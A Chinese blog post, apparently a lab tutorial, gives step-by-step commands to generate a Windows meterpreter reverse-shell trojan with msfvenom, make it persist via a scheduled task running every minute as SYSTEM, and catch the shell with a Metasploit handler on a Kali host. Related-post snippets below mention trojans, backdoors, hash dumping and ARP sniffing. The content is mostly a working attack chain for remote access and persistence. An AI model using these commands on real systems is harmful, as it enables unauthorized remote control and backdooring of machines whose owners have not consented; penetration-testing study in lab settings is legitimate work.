kali监听win2008;反弹shell;msf生成木马;留后门;权限维持;

最新推荐文章于 2024-08-27 07:56:46 发布
最新推荐文章于 2024-08-27 07:56:46 发布
阅读量1.2k 收藏 9
点赞数 1
文章标签: linux java 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaochenhang/article/details/126607974
版权

1、填写自己kali地址和要使用的端口号;生成abcd.exe木马;

┌──(kali㉿kali)-[~/桌面]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.94 LPORT=4455 -f exe > abcd.exe

 

 

2、在win2008里面使用这条命令,将创建⼀个abc计划任务,每⼀分钟 执⾏⼀次abcd.exe;

注意abcd.exe路径;

schtasks /create /tn abc /sc minute /mo 1 /tr C:\Windows\system32\abcd.exe /ru system /f

 

在计算机管理里面可以看见

 

4、kali使用msfconsole工具进行渗透

┌──(root💀kali)-[~]
└─# msfconsole

 5、使用以下模块;

msf6 > use exploit/multi/handler

6、进行配置

配置payload,和先前木马文件一致
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
配置监听kali的IP地址;
msf6 exploit(multi/handler) > set lhost 192.168.31.94
lhost => 192.168.31.94
配置监听端口号
msf6 exploit(multi/handler) > set lport 4455
lport => 4455

 查看配置

msf6 exploit(multi/handler) > options

 

7、监听准备好;

 

msf6 exploit(multi/handler) > run

这里监听成功; 

 

 

小乘杭
关注
kali生成木马
Massimo__JAVA的博客
04-25 2100
攻击机:kali 192.168.116.128受害机:win7 192.168.116.124目标:使用kali
利用msfvenom生成木马文件反弹shell
dreamthe的博客
11-19 4575
1.安装靶机和攻击机 首先自己是在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,我选择的win 7 这里记得在安装虚拟机的时候选择桥接模式,这样你的虚拟机和物理机或者其他虚拟机都是一个网段的。 kali的下载地址Get Kali | Kali Linux: 在虚拟机里面直接选择打开就可以了。 攻击机 kali ip是192.168.3.138 靶机 win server 2008 R2 ip是192.168.3.147 ...
反弹shell---生成木马反弹shellWindows)
weixin_50956890的博客
05-04 4273
Windows反弹shell的一种方式--生成木马
如何使用kali来入侵(渗透)一台windows
最新发布
dzqxwzoe的博客
08-27 1381
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
kali-权限提升】(4.2.7)社会工程学工具包:权限维持创建后门、清除痕迹
08-09 894
权限维持】创建后门、清除痕迹
利用msfvenom制作木马,并且反弹shell
m0_64444909的博客
09-14 5494
msf
容器内反弹shell的51种姿势
帮助别人等于帮助自己 ——MXi4oyu
11-19 1419
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
msfmsfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 4056
msfvenom的使用
冰蝎 连接木马反弹shell拿到权限全过程
热门推荐
hackzkaq的博客
11-25 1万+
一.冰蝎简介 什么是冰蝎 “冰蝎”是一个动态二进制加密网站管理客户端。 在实战中一代webshell管理工具“菜刀”的流量特征非常明显,很容易就被安全设备检测到。 基于流量加密的webshell变得越来越多,“冰蝎”在此应运而生。 一.冰蝎连接getshell方法 1.加入冰蝎特有的的PHP木马,(注意:使用一句话木马无法连接冰蝎),连接密码可以随意改动格式为md5 32为的前16为值 md5(admin)[0-16] <?php @errorreporting(0); session_start()
【渗透实战】通过msf模块获取win7主机远程shell
yummy11111的博客
03-25 1160
渗透学习
kali linux捉肉鸡教程,使用Kali中的Metasploit生成木马控制Windows系统
weixin_42309178的博客
05-02 1529
一、概念:Kali基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是BT5 R3(BtackTrack)。其中Metasploit是一个综合利用工具,极大的提高了攻击者的渗透效率,使用Ruby开发的,使用非常方便,进入该工具的方式:msfconsole ,MSF依赖于Postgresql数据库,在使用MSF之前要开启数据库。二、步骤:Step1:生成木马msfvenommsfve...
kali linux权限维持,msfconsole权限维持
weixin_42297742的博客
04-29 439
获取管理员hash获得shell后,执行命令getsystem提高权限为管理员权限,接着执行命令run post/windows/gather/hashdump获取hashAdministrator:500:aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e:::权限维持执行命令use exploit/windows/...
kali linux权限维持,权限维持篇-NC后门
weixin_39829236的博客
04-29 452
今天一直在总结msf的命令,看到TRY大佬的NC后门,感觉不错,特来复现一下。前提拿到一个shell,并且还需要提权,以高权限进行后门利用,否则会失败。因为整个过程,需要操控注册表来完成。低权限的失败案例:后门安置上传NCKali中带有Windows下的NC。upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32解释一下为什么...
kali木马
m0_46633551的博客
04-07 978
kali简单木马(测试) 需要:kali系统 Android手机 U盘(数据线,蓝牙……) 转换头 你的智商 第一步:打开kali终端 查看直接的root权限,没有的话用sudo -i 第二步:msfvenom -p android/meterpreter/reverse_tcp LHOST=你的IP地址 LPOTR=4444(也可以是别的端口) R> Woodhouse. apk 如上...
渗透测试-权限维持
Bnessy
05-15 496
所以,如果我们已经在目标系统的inetd配置文件中配置好,那么来自外部的某个socket是要执行一个可交互的shell,就获取了一个后门msf监听,重启目标机器,spoolsv.exe进程将加载Monitors注册表项中存在并存储在Windows文件夹System32中的所有驱动程序DLL文件,下图演示了Meterpreter会话已建立与Print Spooler服务(SYSTEM)相同级别的特权,并且已从System32文件夹执行了。使用chattr命令来防止root和其他管理用户删除和修改重要文件。
kali无线渗透之监听wifi网络1_kali 查看wifi发送的信息(1)
2401_84104883的博客
04-03 819
是一个与802.11标准的无线网络分析有关的安全软件,主要功能包括网络侦测、数据包嗅探、WEP和破解。工具可以工作在任何支持监听模式的无线网卡上,并嗅探802.11a802.11b802.11g的数据。下面将对该工具进行详细介绍。是一个套件,在该套件中包括很多个小工具,如表3-2所示。
kali linux wifi监听模式,无线渗透教程1:监听无线网络
weixin_33209042的博客
05-14 7649
第一:配置管理无线网卡1.1这里,我们使用tplink wn722n, kali linux插上即用,无需安装驱动。 1.2Vmare虚拟机配置如下:如网卡插入到电脑后,先将虚拟机设置成桥接模式 之后对虚拟机进行配置 之后呢,我们在终端窗口中,输入ifconfig查看无线网卡,是否接入,显示如下,说明无线网卡,已经接入 第二,设置监听模式这里,我们注意,有些网卡不支持设置监听模式2.1启动监听模式...
kali简单实现arp窃听(kalu在win7和路由器之间实现窃听)
weixin_51295491的博客
09-25 1373
(我喜欢手动画图) 原理:让pc以为kali是路由,路由以为kali是pc,如果只是想窃听,kali就相当于一个传话筒,但是他们两个传的消息都会被kali捕获(裤衩子都被人擦干净了🤔) 开始实验吧: 1.让他们在同一个网段 win7和kali都使用网桥连接(虚拟机-设置-网络适配器-桥连接模式) 可以看到kali的ip192.168.1.108 我的网关ip为192.168.1.1 我的win7的ip为192.168.107(图片我就不放了) 三个都在同一个网段了 2.我们来查一下他们的mac地址吧
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值